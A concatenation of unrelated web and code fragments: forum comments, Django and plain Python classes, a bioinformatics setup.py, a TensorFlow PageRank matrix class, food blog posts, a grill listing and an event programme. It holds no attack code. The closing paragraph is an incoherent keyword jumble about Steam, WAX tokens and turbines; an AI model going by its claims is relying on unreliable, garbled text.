It saved me a ton of money- so I try to post stuff I find deals on- to try to give back somewhat.
^ And goodbye from the forum!
Dude... Don't be a douche. you're better than that.
Dude... Don't be a douche.
1. Absolutely no personal attacks. Personal attacks do not help make a point; they only hurt the community and deter users from helping to create a good forum. Derogatory comments about another member may be removed by any moderator. Repeated or severe personal attacks may lead to a temporary or permanent ban.
Last edited by Wolverine; 02-12-2012 at 11:05 AM.
I have found most of your posts to be helpful and informative.
Perhaps you should read those forum rules yourself and put them into action.
Oh for Chrissakes! Would you guys just ******* give it up already?! I'm getting a little bit annoyed at the childish comments people have been making lately. Grow up...Please.
ha ha......give em hell boss!
Said this before but....... let's just play nice, guys. We're all here for the same specific reason: to split the wind and enjoy our wonderful beasts of burden. "Can't we all just get along?"
Quick Reply: Thank you, thank you! $100 saved! |
import os

from django.conf import settings
from django.db import models
class Tfile(models.Model):
PERM_PUBLIC = 1
PERM_CONFIDENTIAL = 2
PERM_CLASSIFIED = 3
PERM_TYPES = (
(PERM_PUBLIC, 'Public'),
(PERM_CONFIDENTIAL, 'Confidential'),
(PERM_CLASSIFIED, 'Classified'),
)
LIMIT_NONE = 'N'
LIMIT_TIME = 'T'
LIMIT_ACCESS = 'A'
LIMIT_TYPES = (
(LIMIT_NONE, 'None'),
(LIMIT_TIME, 'Time'),
(LIMIT_ACCESS, 'Access'),
)
uid = models.CharField(primary_key=True, max_length=32)
name = models.CharField(max_length=255)
size = models.BigIntegerField()
perm = models.PositiveSmallIntegerField(choices=PERM_TYPES)
qid = models.CharField(max_length=6, null=True, blank=True)
access_count = models.IntegerField(default=0)
limit = models.CharField(max_length=1, choices=LIMIT_TYPES)
time_limit = models.DateTimeField(null=True, blank=True)
access_limit = models.IntegerField(default=0)
upload_time = models.DateTimeField(auto_now_add=True)
last_access_time = models.DateTimeField(auto_now=True)
def __str__(self):
return '{self.name}'.format(self=self)
def abs_path(self):
return os.path.join(settings.TRASH_PATH, self.uid)
class Meta:
verbose_name_plural = "tfiles"
class Penalty(models.Model):
ip = models.GenericIPAddressField(unique=True)
amount = models.IntegerField()
last_time = models.DateTimeField(auto_now=True)
def __str__(self):
return '{self.ip}: {self.amount}'.format(self=self)
class Meta:
verbose_name_plural = "penalties"
|
An opportunity to visit the heart of the downstream industry in Bahrain. Gain an overview on the refining and petrochemical processes and see the various plant equipment such as reactors, columns, heat exchangers and much more.
Secure your seat with online registration.
Answer a set of questions by interacting with exhibitors and delegates and get bonus points for attending technical sessions. Submit your answers at the end of the day to win valuable prizes. Register at the YouChemE Information Desk.
Get your professional headshot taken for free.
An interactive workshop by Roddy Herbert from Koru International on the neuroscience of controlling messages sent from your heart to your brain and vice versa using the Heart Rate Variability technique.
Panel Discussion - How did you make it?
An open discussion on career success and climbing the ladder. |
from __future__ import print_function
import os
import platform
import sys
from setuptools import find_packages, setup
import connor
_REQUIRED_PYTHON_VERSION = (2, 7)
def check_python_version():
if sys.version_info < _REQUIRED_PYTHON_VERSION:
msg_format = '''
Problem: Python v{0}.{1} or above is required but you are using v{2}.
Please install a supported version of Python and try again.\
'''
message = msg_format.format(_REQUIRED_PYTHON_VERSION[0],
_REQUIRED_PYTHON_VERSION[1],
platform.python_version())
print(message, file=sys.stderr)
sys.exit(1)
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
check_python_version()
setup(name='Connor',
version=connor.__version__,
description=('Command-line tool to deduplicate reads in bam files based '
'on custom inline barcoding.'),
long_description=(read('README.rst') + '\n\n' +
read('doc/CHANGELOG.rst') + '\n\n' +
read('doc/AUTHORS.rst')),
url='https://github.com/umich-brcf-bioinf/Connor',
author='University of Michigan Bioinformatics Core',
author_email='bfx-connor@umich.edu',
license='Apache',
packages=find_packages(exclude=['test*']),
classifiers=['Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Operating System :: Unix',
'Operating System :: MacOS',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Bio-Informatics'],
keywords='bioinformatic exome-seq DNA-seq BAM',
setup_requires=['cython'],
install_requires=['pysam>=0.8.4', 'sortedcontainers>=1.5.3'],
entry_points={'console_scripts': ['connor=connor.connor:main']},
test_suite='nose.collector',
tests_require=['nose', 'pysam', 'testfixtures'],
zip_safe=False)
|
A gruesome story from ten years ago…the faint-hearted might like to look away now.
I was opening a tin of corned beef, the sort with a key. I’d turned the key all around the can and was trying to pull the smaller section away – when it suddenly gave way.
“Ouch!” I said, thinking I’d given myself a little nick.
Then the blood started fountaining out of the end of my finger.
The Goblin Meat Pudding sounds like something Gollum would buy down at Crazy Saruman’s Convenience & Liquor Store. But behind the silly name lurks a meal fit for a king.
For the last two weeks every weekday lunchtime I’ve sat down to a couple of Goblin Meat Puddings, made by Simpsons Foods of Manchester. I’ve been eating these things since I was a kid and the gorgeous L recently ordered 20 (yes 20) of them in an online grocery order because she knows I like them.
This lunchtime I have eaten the last of them. So it’s goodbye to the tasty soft pastry for a while and I’ll have to eat something more healthy instead. But I just wanted to pay tribute to one of the finest foods available, and easy to cook too, taking just 90 seconds in the microwave.
I hadn’t eaten one of these things for ages until L bought me some, and the can has certainly changed and is more attractive. The problem with the old one was that it was a bit of a lottery whether you opened it at the right end. So you’d end up having to open up both ends and push the pudding out. Now, with its handy grenade-style packaging, pudding-opening confusion is a thing of the past.
But all waffling and silliness aside, the Goblin Meat Pudding really is the lunch of champions, albeit slightly porkie champions.
I hated going to church as a kid. Not unusual that. Not only did I find it boring, I just didn’t believe – and realised this was odd for a pretty young kid going through the usual rites of passage such as first confession, communion and confirmation.
I think this lack of faith grew into a pretty militant and active atheism (as opposed to just not caring) precisely because every Sunday I would have to go to church with the family, and at numerous times around Easter. I was bemused at Easter by Benediction, wondering if there was some correlation between the length of the service, the number of times we’d have to kneel and then stand up, and the number of altar boys who fainted.
import numpy as np
import tensorflow as tf
from tfgraph.algorithms.pagerank.transition.transition import Transition
from tfgraph.graph.graph import Graph
class TransitionResetMatrix(Transition):
""" Transition Matrix Class
This class implements the functionality of a 2-D matrix that represents the
probability distribution of a walk between the vertices of the graph.
Attributes:
sess (:obj:`tf.Session`): This attribute represents the session that runs
the TensorFlow operations.
name (str): This attribute represents the name of the object in TensorFlow's
op Graph.
writer (:obj:`tf.summary.FileWriter`): This attribute represents a
TensorFlow's Writer, that is used to obtain stats.
is_sparse (bool): Use sparse Tensors if set to True. Not implemented
yet; see the TODO.
G (:obj:`tfgraph.Graph`): The graph on which the transition is referred.
transition (:obj:`tf.Variable`): The 2-D `tf.Tensor` with the same shape as
adjacency matrix of the graph, that represents the probabilities to
move from one vertex to another.
beta (float): The reset probability of the random walks, i.e. the
probability that a surfer walking the graph decides to jump to another
vertex not connected to the current one.
"""
def __init__(self, sess: tf.Session, name: str, graph: Graph,
beta: float,
writer: tf.summary.FileWriter = None,
is_sparse: bool = False) -> None:
""" Constructor of the class.
This method is called to create a new instance of Transition class.
Args:
sess (:obj:`tf.Session`): This attribute represents the session that runs
the TensorFlow operations.
name (str): This attribute represents the name of the object in
TensorFlow's op Graph.
graph (:obj:`tfgraph.Graph`): The graph on which the transition is referred.
beta (float): The reset probability of the random walks, i.e. the
probability that a surfer walking the graph decides to jump to
another vertex not connected to the current one.
writer (:obj:`tf.summary.FileWriter`): This attribute represents a
TensorFlow's Writer, that is used to obtain stats.
is_sparse (bool): Use sparse Tensors if set to True. Not implemented
yet; see the TODO.
"""
Transition.__init__(self, sess=sess, name=name, graph=graph, writer=writer,
is_sparse=is_sparse)
self.beta = beta
self.transition = tf.Variable(tf.add(
tf.scalar_mul(beta, tf.div(self.G.A_tf,
self.G.out_degrees_tf)),
(1 - beta) / self.G.n_tf),
name=self.name)
self.run_tf(tf.variables_initializer([self.transition]))
def get_tf(self, *args, **kwargs):
""" The method that returns the transition Tensor.
This method will return the transition matrix of the graph.
Args:
*args: The args of the `get_tf()` method.
**kwargs: The kwargs of the `get_tf()` method.
Returns:
(:obj:`tf.Tensor`): A `tf.Tensor` that contains the distribution of
transitions over vertices of the graph.
"""
return self.transition
def update_edge(self, edge: np.ndarray, change: float) -> None:
""" The callback to receive notifications about edge changes in the graph.
This method is called from the Graph when an addition or deletion is
produced on the edge set, so it will probably be necessary to recompute
the transition matrix.
Args:
edge (:obj:`np.ndarray`): A 1-D `np.ndarray` that represents the edge that
changes in the graph, where `edge[0]` is the source vertex, and
`edge[1]` the destination vertex.
change (float): The variation of the edge weight. If the final value is
0.0 then the edge is removed.
Returns:
This method returns nothing.
"""
if change > 0.0:
self.run_tf(tf.scatter_nd_update(
self.transition, [[edge[0]]],
tf.add(
tf.scalar_mul(
self.beta,
tf.div(
self.G.A_tf_vertex(edge[0]),
self.G.out_degrees_tf_vertex(edge[0]))),
(1 - self.beta) / self.G.n_tf)))
else:
self.run_tf(tf.scatter_nd_update(
self.transition, [[edge[0]]],
tf.where(self.G.is_not_sink_tf_vertex(edge[0]),
tf.add(
tf.scalar_mul(
self.beta,
tf.div(
self.G.A_tf_vertex(edge[0]),
self.G.out_degrees_tf_vertex(edge[0]))),
(
1 - self.beta) / self.G.n_tf),
tf.fill([1, self.G.n], tf.pow(self.G.n_tf, -1)))))
self._notify(edge, change)
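A minimal usage sketch under stated assumptions: the Graph constructor arguments below are guesses, since only the Transition side of the API is visible here. The variable built in __init__ implements the PageRank-style transition with uniform reset, T = beta * A / out_degrees + (1 - beta) / n.

import tensorflow as tf
from tfgraph.graph.graph import Graph

with tf.Session() as sess:
    g = Graph(sess, 'G') # hypothetical constructor arguments
    transition = TransitionResetMatrix(sess, 'T', g, beta=0.85)
    print(sess.run(transition.get_tf())) # row-stochastic transition matrix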
|
Hestan Outdoor grills combine the ultimate in precision performance & innovative design to meet the needs of every griller, from the novice to the experienced grill master. The Hestan Outdoor grill series is made in the USA with heavy-gauge welded-body construction, commercial grade end caps, Zamak die cast knobs, burner indicators & bezels and accented throughout by Hestan Marquise panels and handles.

The Hestan 36-Inch Freestanding Natural Gas Grill On Tower Cart features two heavy duty 321 grade stainless steel Trellis tubular style burners that provide up to 25,000 BTUs each and one high-performance variable ceramic infrared sear burner that provides up to 25,000 BTUs for a total of 75,000 BTUs of high performance cooking power. The hybrid burner configuration offers maximum cooking options. The ceramic infrared sear burner allows you to sear thick cuts of meat, sealing in precious juices. Grilling surface temperatures are evenly distributed by a radiant ceramic briquette tray system.

The 14,000 BTU multipurpose ceramic infrared top burner with salamander placement is perfect for rotisserie, broiling or finishing and includes a concealed whisper-quiet chain-driven rotisserie motor system rated for up to 50 pounds, as well as a porcelain broiling pan, rotisserie spit and forks. The laser DiamondCut 5/16-inch stainless steel cooking grates and warming rack provide 653 sq. in. primary and 236 sq. in. secondary cooking area for a total of 889 square inches of evenly-heated grilling surface. The warming rack features three vertical positions, allowing it to be used as additional cooking area or concealed storage when not in use.

This grill comes packed with many convenient features that add to your grilling experience, including the easy-open, spring-assist Horizon hood, designed to stay open at any desired height. Motion-activated Stadium halogen under-hood lighting illuminates the grilling area while the LED control panel lighting keeps your controls visible for nighttime grilling and entertaining. The symmetrical flip-to-clean radiant tray and stainless steel removable drip tray make cleanup simple, and a one-push automatic ignition system makes lighting your grill a breeze.

The Hestan Double Door Tower Cart offers an abundance of storage and working space with two folding side shelves and two soft-close access doors with recessed Marquise-accented panels & commercial grade handles. The cart interior features a pullout propane tank tray that can easily be converted for trash & recycling bin storage. Commercial-grade casters allow for smooth cart movement and 360-degree maneuverability. This grill features durable, powder coated stainless steel panels in the Hestan signature Tin Roof color finish.
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# FILE: userObj.py
#
# An object that mirrors the user data table in the database
#
# Copyright by Author. All rights reserved. Not for reuse without
# express permissions.
#
#
from datetime import datetime
class userObj(object):
def __init__(self):
self.rid = None
self.user_name = ""
self.screen_name = ""
self.user_id = 0
self.join_dt = datetime(2000,1,1,0,0,0,0)
self.verified = False
self.geo_enabled = False
self.location = ""
self.lang = ""
self.time_zone = ""
self.url = ""
self.description = ""
def to_dict(self):
rec = {}
if( self.rid ):
rec['rid'] = self.rid
rec['user_name'] = self.user_name
rec['screen_name'] = self.screen_name
rec['user_id'] = self.user_id
rec['join_dt'] = self.join_dt
rec['verified'] = self.verified
rec['geo_enabled'] = self.geo_enabled
rec['location'] = self.location
rec['lang'] = self.lang
rec['time_zone'] = self.time_zone
rec['url'] = self.url
rec['description'] = self.description
return rec
def from_dict(self, rec):
nobj = userObj()
if( rec ):
if( rec.get('rid') ):
nobj.rid = rec['rid']
nobj.user_name = rec['user_name']
nobj.screen_name = rec['screen_name']
nobj.user_id = rec['user_id']
nobj.join_dt = rec['join_dt']
nobj.verified = rec['verified']
nobj.geo_enabled = rec['geo_enabled']
nobj.location = rec['location']
nobj.lang = rec['lang']
nobj.time_zone = rec['time_zone']
nobj.url = rec['url']
nobj.description = rec['description']
return nobj
def clone(self):
nobj = userObj()
if( self.rid ):
nobj.rid = self.rid
nobj.user_name = self.user_name
nobj.screen_name = self.screen_name
nobj.user_id = self.user_id
nobj.join_dt = self.join_dt
nobj.verified = self.verified
nobj.geo_enabled = self.geo_enabled
nobj.location = self.location
nobj.lang = self.lang
nobj.time_zone = self.time_zone
nobj.url = self.url
nobj.description = self.description
return nobj
def __repr__(self):
return "<userObj('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')>"%(str(self.rid),str(self.user_name),str(self.screen_name),str(self.user_id),str(self.join_dt),str(self.verified),str(self.geo_enabled),str(self.location),str(self.lang),str(self.time_zone),str(self.url),str(self.description))
|
Sects which are at best shadows of Churches wax and wane with the priestly powers they subconsciously or. Steam and.
Removes his cap when visiting the mess decks as token of respect.
Multiposition unit for accelerated determination of the efficiency of the condenser tubes of steam turbines. Take advantage of our Niagara Falls Canada Day deals, discounts and specials.
Diamond v. Diehr. No. 79-1112. or steam apparatus, by which. A token will be given from there and you have to take this token to. Each individual transaction incurs a small fee which is taken in the form of WAX tokens and is then used for. Companies like Steam have monopolized the gaming.
During the Great Winter Hunt 2017: 1 Tournament Token: 20 Champion Charms. 10 Wax Charms: 1 Bottled Cold Fusion.
Corl is revenue sharing on the blockchain and is a revenue-sharing token designed to support and. the President at WAX. to buy and sell steam. OPSkins Marketplace has announced support for a 16th game, tradable with WAX Tokens. Gamers can now trade digital items for Steam game Armello using WAX Tokens.
One chamber contains a turbine that is spun as hot exhaust gases are.
Western Europe has the worldwide highest risk of radioactive contamination caused by major reactor accidents. Model X is the safest, quickest, most capable SUV ever—with standard all-wheel drive, best in class storage and seating for up to seven adults.
Deconstructing Fires. the Burst allowed you to remove a fading counter to put a green creature token into. but that it would often run out of steam with.Its insular character has allowed it to develop a very unique and intricate.
Self Service Steam Car Washer-oem In Control, Find Complete Details about Self Service Steam Car Washer-oem In Control,Self Service Steam Car Wash Machine,Coin Token.The gaming industry is now bigger than music and movies combined, and it will only continue to grow as we move into VR and HR.
Please enjoy this nautical glossary of sailing terms. Treating old sails with oil or wax to. |